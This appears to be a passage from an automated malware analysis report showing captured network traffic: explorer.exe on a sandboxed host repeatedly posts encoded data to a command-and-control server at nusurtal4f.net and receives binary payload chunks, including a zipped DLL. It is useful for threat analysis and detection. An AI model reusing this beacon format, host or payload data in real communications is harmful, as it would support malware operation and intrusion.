02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11 54 3f 57 4d ea 16 11 b1 29 39 42 d6 86 ce a3 f6 8e bf 00 9e ec 07 96 d8 0f 1c 6d 56 57 b4 9a 9b 8b bb ed 07 62 80 36 7b e5 11 7c 21 da 0f bc 08 ef d4 4f ec 07 12 01 4d 1a 89 8a e5 3e d6 3e c3 24 5c 2e 25 d4 d7 4c d2 88 7a 46 93 6c d0 a5 f6 03 33 9a 95 9d 01 b3 7c 08 b0 30 23 2a 4e 2b ee b7 1f 38 c4 9b e7 35 db 0f c0 ef 4e af e8 8a 55 34 2b 62 80 15 66 53 ff 03 32 3a 63 f6 8e 1f 03 7a e5 b6 04 c0 31 43 a9 1f 92 b6 da 0f 40 41 cd 9d 5a f8 26 b5 d6 a1 f6 95 77 6f 13 d5 d7 e2 16 fb 81 c3 00 52 40 04 Data Ascii: PKznN<{rinssdbm3.dll\|8NY6$J$1D a.jLVCN;}/$Z,TRqcEc=;{sp`A?MW!a?N~eAWo[},;+\Jw\|k<yR^Eonxsc=V,FcuwO[u{<w7P{K~Ewcz^[Z6GV2+n41M.w{fnJL{ dM+ /)$X!LK`MwILA8rIXr87}<]rTWmb6/_aWlB3n_joMz_Q8KgrLH.v6[4I{1g<>M$G&Y-O9\,tWmX Y3S<#}">0RBg,lh.sorp8)3Kvdsn3+]+krMu_Y\/8T&BC"u;ek u$~`{!M\WY37+nQZ3\G5dZhVLZ\|k5XFYlVVWC\|b\Zm 0PF8{]UpRW,nMMs_@>Q N>T?WM)9BmVWb6{\|!OM>>$\.%LzFl3\|0#N+85NU4+bfS2:cz1C@AZ&woR@

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.4	49866	45.141.84.21	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:43.415836096 CEST	17027	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nusurtal4f.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 234 Host: nusurtal4f.net
Oct 29, 2021 20:50:43.415842056 CEST	17027	OUT	Data Raw: 4a 9d fe b9 4a 60 51 2e 2d 75 52 22 0f ad 22 c9 2e 18 e8 60 8b 1d dc da b2 1a d5 84 0b 85 df e4 ff db 88 b6 00 31 e2 c3 d0 5f 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 bb a2 18 be Data Ascii: JJ`Q.-uR"".`1_jp_S61oJf=B!bO!s:kL%{L~!$.wei`)g25Nb*lHF 2eZ/KAE:5oG&wcj2@bkADN
Oct 29, 2021 20:50:43.591753006 CEST	17027	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:43 GMT Content-Type: text/html; charset=utf-8 Content-Length: 7 Connection: keep-alive X-Powered-By: PHP/5.6.40 Data Raw: 03 00 00 00 1d 3d 5e Data Ascii: =^
Oct 29, 2021 20:50:43.600584984 CEST	17028	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nusurtal4f.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 352 Host: nusurtal4f.net
Oct 29, 2021 20:50:43.600610971 CEST	17028	OUT	Data Raw: 4a 9d fe b9 4a 60 51 2e 2d 75 52 22 0f ad 22 c9 2e 18 e8 60 8b 1d dc da b2 1a d5 84 0b 85 df e4 ff db 88 b6 00 31 e2 c3 d0 5f 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 ba 8a 14 62 cd d6 4f 96 ba d9 42 a0 Data Ascii: JJ`Q.-uR"".`1_jp_S61oJf=B!bOBP#$x>vP"hkK&0{'@`_8VNYeVzz:Vel4q6#6P?BrnG56gf9b
Oct 29, 2021 20:50:43.786339998 CEST	17028	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:43 GMT Content-Type: text/html; charset=utf-8 Content-Length: 42 Connection: keep-alive X-Powered-By: PHP/5.6.40 Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 07 9b 01 c2 40 9c e2 0f b3 66 f5 26 0a 5b 22 f9 6a 00 7e c2 5d 31 0e Data Ascii: Uys/~(`:@f&["j~]1
Oct 29, 2021 20:50:50.075287104 CEST	18336	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nusurtal4f.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 335 Host: nusurtal4f.net
Oct 29, 2021 20:50:50.075326920 CEST	18337	OUT	Data Raw: 4a 9d fe b9 4a 60 51 2e 2d 75 52 22 0f ad 22 c9 2e 18 e8 60 8b 1d dc da b2 1a d5 84 0b 85 df e4 ff db 88 b6 00 31 e2 c3 d0 5f 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a3 19 ba 8a 14 62 cc d6 4f 96 ad da 54 d5 Data Ascii: JJ`Q.-uR"".`1_jp_S61oJf=B!bOTb+)+c+9uJ9Lqe3b2XT9~2yFkzWQ3BsH2xK9^@Yr2%%fGGbmA?Ps
Oct 29, 2021 20:50:50.254838943 CEST	18339	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 327 Connection: keep-alive X-Powered-By: PHP/5.6.40 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 29, 2021 20:50:50.293004990 CEST	18352	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nusurtal4f.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 316 Host: nusurtal4f.net
Oct 29, 2021 20:50:50.293040991 CEST	18352	OUT	Data Raw: 4a 9d fe b9 4a 60 51 2e 2d 75 52 22 0f ad 22 c9 2e 18 e8 60 8b 1d dc da b2 1a d5 84 0b 85 df e4 ff db 88 b6 00 31 e2 c3 d0 5f 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 bb 8a 14 62 cd d6 4f 96 8e b5 28 f8 Data Ascii: JJ`Q.-uR"".`1_jp_S61oJf=B!bO()0g?k7`MVk/a3s0t!!j"sd!-eqI`)S:"pD+BAx>UuE\JIqfw\ikL
Oct 29, 2021 20:50:50.482783079 CEST	18502	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.6.40
Oct 29, 2021 20:50:50.506480932 CEST	18503	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nusurtal4f.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 212 Host: nusurtal4f.net
Oct 29, 2021 20:50:50.506525993 CEST	18503	OUT	Data Raw: 4a 9d fe b9 4a 60 51 2e 2d 75 52 22 0f ad 22 c9 2e 18 e8 60 8b 1d dc da b2 1a d5 84 0b 85 df e4 ff db 88 b6 00 31 e2 c3 d0 5f 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 b8 8a 14 62 cd d6 4f 96 a8 ad 27 e8 Data Ascii: JJ`Q.-uR"".`1_jp_S61oJf=B!bO'1tP0{TgTO'7 0/<wMb(0/1e[\GvY9u?#/>!9,\a6
Oct 29, 2021 20:50:50.684120893 CEST	18637	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.6.40 Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 b1 ba 89 c7 a8 25 9f ae 04 75 64 62 d8 e6 b8 a1 54 5e 1b 80 2b d8 55 a8 c7 ea 87 23 6d 16 be 61 f6 31 6d 17 41 3e da 16 a3 c9 32 6e a0 14 dc ac 2f 7b b0 2d 61 47 b0 7a 0d de 75 8f f9 9f 56 11 36 05 4a f4 e2 d7 c0 07 43 c8 48 09 d2 74 94 82 bf 6c 13 d9 39 03 d5 18 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 8e ff 0e 43 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 85 f6 ff 78 f3 56 db c4 0d 13 13 e3 0f e0 92 24 18 4f c5 03 71 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a f0 96 be 21 51 61 9a d4 3e 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 a2 7a 31 6c 1a 7c 0a 8d 1b f9 e6 0e 10 eb 7e 71 eb 90 f0 1a 10 de 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 22 a6 0f 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 73 33 cd 46 99 48 15 ac af eb d9 55 3d af ba 68 92 de fe 9d 57 7c 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b a8 d4 de 8e 82 11 e8 e4 1f 9e a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 af 5b 85 1f d4 8c 69 91 9c 61 06 f1 2c 9a af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 e4 56 89 8b e1 42 78 d7 9c 9e c3 e0 2b a5 b6 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 a2 aa 45 63 80 e3 1c b1 65 f5 52 48 d4 3f 96 4d 8d e7 17 3f fe e7 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 54 a3 c7 f6 df ef 02 45 3d f4 61 f1 4e 14 72 e1 af 99 ef 7b 0d 84 ac 33 ff cd 05 4e 42 17 2e b3 a6 43 ff 45 bb b2 4c b8 5d 8c a0 47 e1 04 b4 4d 58 ec fe e7 44 ca 9b 37 c4 24 b1 46 b2 ca 6c 27 88 60 67 ac 03 c1 6f 02 76 d9 11 53 14 0c 68 a6 73 5e c1 f7 69 d1 64 5e ea f5 5c 68 d1 64 7d fa 99 83 7b a3 48 44 fe Data Ascii: 1f42`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShG%udbT^+U#ma1mA>2n/{-aGzuV6JCHtl93Ob>!ZC:>CSSQ{~xV$Oqa~i~]DzN,z!Qa>\|(kJk?a]V4z1l\|~qJO;yLuVW;r#"1er+Lc1<'is3FHU=hW\|U@Wd{9f(B@w=fd3Dw)pKNTUo)2([>T~uW[ia,[}PmCVBx+z(Fzk#EceRH?M?~Mpvn%n5_)CCUb:@3%}/#wRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=TE=aNr{3NB.CEL]GMXD7$Fl'`govShs^id^\hd}{HD
Oct 29, 2021 20:50:50.684148073 CEST	18638	IN	Data Raw: 9a dd 92 6a 0c 1c cd 03 58 d8 e2 32 dd 66 7b 2a be 58 0c ec ae 5d c0 68 d6 2d 0f 74 4d 43 06 52 4b 24 08 9a ed 65 14 87 b0 9a 3b 20 6f 03 2a f2 66 05 06 78 ff 4a 84 2f f5 11 63 4f 51 9a 5b 6c e8 42 41 eb ed 7f ee d8 71 22 78 69 ba 28 3d 65 c8 c2 Data Ascii: jX2f{X]h-tMCRK$e; ofxJ/cOQ[lBAq"xi(=ek3) Q@ ]X\|bu/0pxr/@b35A,Ag'UyXzrj\|.0A!ij}i#pE*o.RZX{Mwu9ap
Oct 29, 2021 20:50:50.684165001 CEST	18640	IN	Data Raw: 52 9d ba da da c1 f0 d5 f6 c4 d1 9e e5 f2 99 6a 07 3f 27 28 ab 29 4f 78 ca f1 2b 0e bc 2b 4f d1 65 b9 0d 3a f2 14 9c 0b 16 10 00 b1 89 b7 01 5f 1d c1 e3 73 da e8 c0 5f aa 52 ed f9 c1 0e 9f bc b6 21 ef 06 81 4f 74 36 0f 23 88 40 f9 32 0f 36 ae 50 Data Ascii: Rj?'()Ox++Oe:_s_R!Ot6#@26P0=oF7$N#n=u1@jhY-"E O(s+~XdG.#spJ5@6=Y%m*$C&q&vxV7CbIoQxqr
Oct 29, 2021 20:50:50.684181929 CEST	18641	IN	Data Raw: 4b 24 54 a8 ba ec 13 08 1b 17 7f 13 b9 47 89 c3 6a 9e 7b 02 de 27 ed a3 4a b6 9c 34 2e 3f 0f 0a 80 e3 7a 2c 4f 01 dc 85 2d 73 d0 ab 7b 6f 66 89 ab bc a9 f9 e4 25 e4 04 11 b0 f5 cb 35 50 9e 8b ed 99 00 8b 00 06 d4 16 f1 e5 2f c8 97 e8 4a 15 36 5e Data Ascii: K$TGj{'J4.?z,O-s{of%5P/J6^?)ogTFFH5gkZLx^i@.4 \|Y>zZgt^l/xE}'9aGR*\lBSA1.uvBN [,#f2r9yab:4,nD
Oct 29, 2021 20:50:50.684199095 CEST	18643	IN	Data Raw: cb 53 5c 74 a9 4c a8 e1 f3 e2 43 3b d4 e1 98 4a ae 47 f7 5b e8 91 86 16 0f 04 3b d5 4d 76 0f 33 38 7d 85 84 3e 2e 39 01 cb 9f c7 1c 57 44 43 0d 1a 12 c3 8e 77 89 98 5d 93 41 14 09 1a 75 2a 29 79 8c 2b 1d 47 bd 8d dd a3 99 91 e0 ce cc bf 4f c9 d5 Data Ascii: S\tLC;JG[;Mv38}>.9WDCw]Au*)y+GO@S6R.@i==-5,7[V`A7PbfCU/@pG;p~lcQnIcx$edO+EjK5S:sCt}!znpO1ON
Oct 29, 2021 20:50:50.684215069 CEST	18644	IN	Data Raw: 57 1d 13 b7 cd 40 35 e0 83 e7 ae a3 72 52 ad be 87 a7 bf b5 26 77 17 ab 1f c2 b6 5d 4a a6 a3 f6 4c d0 3d bb e4 e4 f1 f7 68 05 2b d1 05 a8 03 78 70 49 a2 2c ab b9 60 15 f4 e2 74 9d 9d ed 94 8b 72 e6 3d 62 39 12 77 72 c0 d4 43 9a a5 59 41 15 ab 1d Data Ascii: W@5rR&w]JL=h+xpI,`tr=b9wrCYAc'NHq~GlkqA%\1&TQp*YCWgFLh?gll2##XzXoeDtq%=;IO1[$a-F]wlkJ>hKUf&s
Oct 29, 2021 20:50:50.684228897 CEST	18644	IN	Data Raw: 73 c3 e9 34 0a 71 1b 84 b8 5f 6a bc 8c da d6 d2 c2 15 14 38 01 e0 78 e7 0c 66 ec f8 76 94 b3 30 2a 24 5d d8 d0 59 00 0a 63 e7 94 0e 8a 44 88 94 bf a1 b3 6f 48 ce 53 12 1b 9d 7e 3d cc 76 56 83 ad e0 11 f3 81 25 7f d9 21 9f 73 7b d3 1e 13 2a cf 13 Data Ascii: s4q_j8xfv0$]YcDoHS~=vV%!s{/yrPY7h3'chT-&kQq]_3?9PbFDucm!BU^AvJ&
Oct 29, 2021 20:50:50.684304953 CEST	18646	IN	Data Raw: 31 30 30 30 0d 0a 42 c8 93 d0 74 3b 19 d4 22 b9 16 9e 6d 83 b9 c0 6c 72 c4 25 ed fb 2f bf 26 94 d4 36 42 87 e0 e2 6d 66 2b e3 4d d1 ac e7 aa 5a aa 7a f4 9a 97 6d 94 2c 64 79 e7 75 bd ad af d8 d0 38 69 15 dd e9 31 4f 14 0b 71 95 b3 29 6f 09 ab f9 Data Ascii: 1000Bt;"mlr%/&6Bmf+MZzm,dyu8i1Oq)o>i#n(IVj&+bEHi$10S~bj%%W!{zagI>+'Eh^&xs#Ed:FMb=Npgpp_yS
Oct 29, 2021 20:50:50.684323072 CEST	18647	IN	Data Raw: 04 0c 93 57 84 de bb 10 27 6d 12 69 1a c7 7b 44 6b 0e f6 71 2c 58 6e 10 7b 0d ad e9 df e9 fd e6 a0 bd 78 1c b8 1f 02 0d f1 58 ae 6e 28 57 b0 7f 31 30 76 87 42 65 cc 96 33 c2 07 37 fb 52 34 1c da 5d 10 5c 1c f1 5c 8d bd ce ac b6 41 01 1d 02 0e 7e Data Ascii: W'mi{Dkq,Xn{xXn(W10vBe37R4]\\A~O`hMRRlDCw3,'>w'V)\|^KC\xR,F`]wYVPu$4xf Xa\|C&AsJK/ay;,pW(K$=F[W.:."%8i}>!DW
Oct 29, 2021 20:50:50.735155106 CEST	18701	IN	Data Raw: 32 5c 0d 04 e0 1f 7f 8e 73 57 5c 69 64 07 66 c3 0c d1 b5 42 6b 4b d8 85 f3 dd 41 63 b0 a7 12 c4 0e 1e 0e ee 7c a8 7a 17 4e 83 06 f6 22 64 5d 40 3c 32 33 f9 c8 7d 4e ff 5b a7 32 42 e4 b7 f8 22 32 ee 76 f3 98 6e 81 7c e7 7e f1 a7 34 80 94 80 f8 26 Data Ascii: 2\sW\idfBkKAc\|zN"d]@<23}N[2B"2vn\|~4&NmxZ/:@NDq`* 1)aCySrBYX&%!kncq@iKknUG{i/:\4;tAJ>[.>xN8W}_Y-=%BR.k?KMP
Oct 29, 2021 20:50:50.750668049 CEST	18703	IN	Data Raw: 4c 3d b2 ed e4 0e d4 aa 2c f9 ed e0 29 0a 84 57 1f 95 a7 00 94 62 e9 e0 c2 5e ef 23 ca 9a 57 b6 5a cf b2 8b eb 1a f9 a8 0b 13 54 db f2 41 90 62 d8 ad 6f fc 06 40 18 e9 47 44 9f 6a a7 e4 4c fd aa 4c 50 10 df 91 26 0e ad 16 2d 99 b3 3a 4b 07 02 02 Data Ascii: L=,)Wb^#WZTAbo@GDjLLP&-:Kd1000r"DTL<l5GpxCNUJ;*O\|tBYmJNX~uNyXqe8aMOaz/oA'uDHT2]ZPcy
Oct 29, 2021 20:50:54.772475004 CEST	20057	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nusurtal4f.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 362 Host: nusurtal4f.net
Oct 29, 2021 20:50:54.772516012 CEST	20057	OUT	Data Raw: 4a 9d fe b9 4a 60 51 2e 2d 75 52 22 0f ad 22 c9 2e 18 e8 60 8b 1d dc da b2 1a d5 84 0b 85 df e4 ff db 88 b6 00 31 e2 c3 d0 5f 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a3 19 b8 8a 14 62 cc d6 4f 96 99 e4 29 c5 Data Ascii: JJ`Q.-uR"".`1_jp_S61oJf=B!bO)w[M}h+SFYGQ:Wl"?FtS&wd9BF(Or#qwK]6K5%4o_O:rxv\|4*qy
Oct 29, 2021 20:50:54.946487904 CEST	20475	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:54 GMT Content-Type: text/html; charset=utf-8 Content-Length: 327 Connection: keep-alive X-Powered-By: PHP/5.6.40 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 29, 2021 20:50:55.036129951 CEST	20476	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nusurtal4f.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 224 Host: nusurtal4f.net
Oct 29, 2021 20:50:55.036173105 CEST	20476	OUT	Data Raw: 4a 9d fe b9 4a 60 51 2e 2d 75 52 22 0f ad 22 c9 2e 18 e8 60 8b 1d dc da b2 1a d5 84 0b 85 df e4 ff db 88 b6 00 31 e2 c3 d0 5f 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 b9 8a 14 62 cd d6 4f 96 b8 bc 15 da Data Ascii: JJ`Q.-uR"".`1_jp_S61oJf=B!bO#x'\rn["XU:W,z6K&o}y3q9Swua[2Q:odv,7nTA"Mlk6}i
